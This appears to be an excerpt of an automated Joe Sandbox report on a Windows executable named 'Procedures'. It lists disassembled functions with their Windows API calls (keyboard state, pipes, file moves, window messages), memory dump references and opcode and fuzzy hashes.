                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 01e770e412af54fccfe6951e8a29366919f3a1af6ee854d002636fd7abd530cd
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7ff4a62249e8526216831cbaad6217830c75dbdeef1568d0edb9f14ce52823fe
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01e770e412af54fccfe6951e8a29366919f3a1af6ee854d002636fd7abd530cd
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C5136A09487D53EFB37A334CC11B7A7E985B05308F0C958AE0DC6A8D2D395EC88E750
                                                                                                                                                                                                                                                                                                    Function 00E557A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00E55F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00E557E3
                                                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00E5585E
                                                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00E55879
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00E5589F
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,00E55F16,00000000,?,?,?,?,?,?,?,?,?,00E55F16,?), ref: 00E558BE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00E55F16,00000000,?,?,?,?,?,?,?,?,?,00E55F16,?), ref: 00E558F7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1a1879a645e8ee38cccdfd910e55da77e35d7efb89be506e121b3f0b36e0c209
                                                                                                                                                                                                                                                                                                    • Instruction ID: 643ef4cfc77caa2d0c8ca594e532f5a9d7fd31fbec404629229c0dbaba12d94a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a1879a645e8ee38cccdfd910e55da77e35d7efb89be506e121b3f0b36e0c209
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E51CF72A04249DFCB10CFA8D891AEEBBF8FF48311F14456AE951F7291E3309949CB60
                                                                                                                                                                                                                                                                                                    Function 00E219CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121keyboardCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00E219E1
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00E219FE
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00E21A23
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00E21A3D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                                    • String ID: $'
                                                                                                                                                                                                                                                                                                    • API String ID: 4210589936-3149202309
                                                                                                                                                                                                                                                                                                    • Opcode ID: 68a209fb7ae22749dddeb1b2cb36fc4f0395adb9598a6bee1b58416cd7c11b53
                                                                                                                                                                                                                                                                                                    • Instruction ID: 166caf733f62aadfb2b1c665149abe40a840f075642be069c4d60ce6828abcdf
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68a209fb7ae22749dddeb1b2cb36fc4f0395adb9598a6bee1b58416cd7c11b53
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C141B0B0A0521AFFDF159F68D844BEEB7B0FB05364F20931AE429B2290D7306A54CB91
                                                                                                                                                                                                                                                                                                    Function 00E43090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E430BB
                                                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00E430C3
                                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E43151
                                                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00E4317C
                                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E431D1
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                    • Opcode ID: c65753fbb7fd7e2edf9aac9275ae6c4a938c7d4d6d26e282fb295e104c45f382
                                                                                                                                                                                                                                                                                                    • Instruction ID: dd2748bfd90c5a1e1b5b4689b26ef020c2b0a057990b40efac628bd6e8b37c8a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c65753fbb7fd7e2edf9aac9275ae6c4a938c7d4d6d26e282fb295e104c45f382
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F741D234A01208AFCF10DF79E885A9EBBB5AF45328F149255E814BB392D731DB05CB90
                                                                                                                                                                                                                                                                                                    Function 00E8D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E8D7CD,?), ref: 00E8E714
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E8D7CD,?), ref: 00E8E72D
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00E8D7F0
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00E8D82A
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8D8B0
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8D8C6
                                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 00E8D90C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                                    • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                                    • Opcode ID: e016cfc38842c48e0dbf416db180e64dbfe1eb9d90d72ad887b134c20c58ff78
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5f3da1b8a687c3551019ef6bef8520aab5e93588a64f7f034b7e480027269311
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e016cfc38842c48e0dbf416db180e64dbfe1eb9d90d72ad887b134c20c58ff78
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F14134719452189EDF16FBA4DD85ADE77F8AF08380F1014EAA50DFB191EA34A788CB50
                                                                                                                                                                                                                                                                                                    Function 00E942B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetInputState.USER32 ref: 00E94310
                                                                                                                                                                                                                                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00E94367
                                                                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00E94390
                                                                                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00E9439A
                                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E943AB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 2256411358-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9318e3966be623d4779dd7646f16eafa5e510adf592bfe9ebad77f2166532d09
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4ffcd2a20478f28dc9ca3ac5f064b644fbb297bdc4ae2e1aa7972b8c27b32ce1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9318e3966be623d4779dd7646f16eafa5e510adf592bfe9ebad77f2166532d09
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B31A4F0504346EEEF35CB75DC49FB63BA8AB4030CF04566DD562B21E0E7A4998ACB21
                                                                                                                                                                                                                                                                                                    Function 00EB3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00EB38B8
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB38EB
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB3920
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00EB3952
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00EB397C
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB398D
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EB39A7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 61d1a129c1fa34cf923ed6f7e447612ed6e0f92a1fe29c833a5b69bc19f85bb6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 08fe4ce3c6672495d32de108809e95cc1c5f213da7c18e57d8d70d8e24156b55
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61d1a129c1fa34cf923ed6f7e447612ed6e0f92a1fe29c833a5b69bc19f85bb6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48315934604255AFDB25CF69DC86FA637E0FBC6714F1422A4F544AB2B5CBB0A948CB01
                                                                                                                                                                                                                                                                                                    Function 00E8808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E880D0
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E880F6
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00E880F9
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00E88117
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00E88120
                                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00E88145
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00E88153
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 22b9e20ff9a307209db5754afcf3d858656dd46a80214b103858035cb349fa4a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9c9be250d5dce1417b67a160d740accfedcf0a5a8b68c8cc20412d0b7ac43d30
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22b9e20ff9a307209db5754afcf3d858656dd46a80214b103858035cb349fa4a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C219772605219AF9F10EFA9DC88CBB73ACEB093647448525FD19EB290DE70DC468760
                                                                                                                                                                                                                                                                                                    Function 00E88164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E881A9
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E881CF
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00E881D2
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32 ref: 00E881F3
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32 ref: 00E881FC
                                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00E88216
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00E88224
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: d0ac4d46d2a12fd6d9ee27b0895bcc7f0a5f101426b6420ef13f25deceec295c
                                                                                                                                                                                                                                                                                                    • Instruction ID: f3d6e504ff80aac0746c611e600071f965b3135a84b988e8e8aa0857593bdf78
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0ac4d46d2a12fd6d9ee27b0895bcc7f0a5f101426b6420ef13f25deceec295c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4021A431605104BF9B14EBA9EC88DAA77ECEB093647408125FD19EB2A0EF70EC41CB64
                                                                                                                                                                                                                                                                                                    Function 00E90E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00E90E99
                                                                                                                                                                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E90ED5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                    • Opcode ID: 33b1607d5d4481b49d1e4537db23e27832457d55c3b8d98f11370b032ebd1db0
                                                                                                                                                                                                                                                                                                    • Instruction ID: 053c0f1c37912c992ac510bb2b5c403708ade666bcefae8003296f5bba046f73
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33b1607d5d4481b49d1e4537db23e27832457d55c3b8d98f11370b032ebd1db0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2215E7160430AAFDF308F69DC08A9A77E8AF54764F604A69FCA5F72D0E7709940CB50
                                                                                                                                                                                                                                                                                                    Function 00E90F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00E90F6D
                                                                                                                                                                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E90FA8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                    • Opcode ID: d8dea124e0c95b2687850e7b7b763fd70dcfa586d0e92e3f0d8f00d44f7a7228
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6b92c48ab93361fa5ad59711ac1fa9d7cab6f2e43a7f3f117b641ecf73120607
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8dea124e0c95b2687850e7b7b763fd70dcfa586d0e92e3f0d8f00d44f7a7228
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F217A7160434AAFDF208F698C04A9A77E8BF55728F601B59F8A1F32E0E7719984DB50
                                                                                                                                                                                                                                                                                                    Function 00EB4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E278B1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27873: GetStockObject.GDI32(00000011), ref: 00E278C5
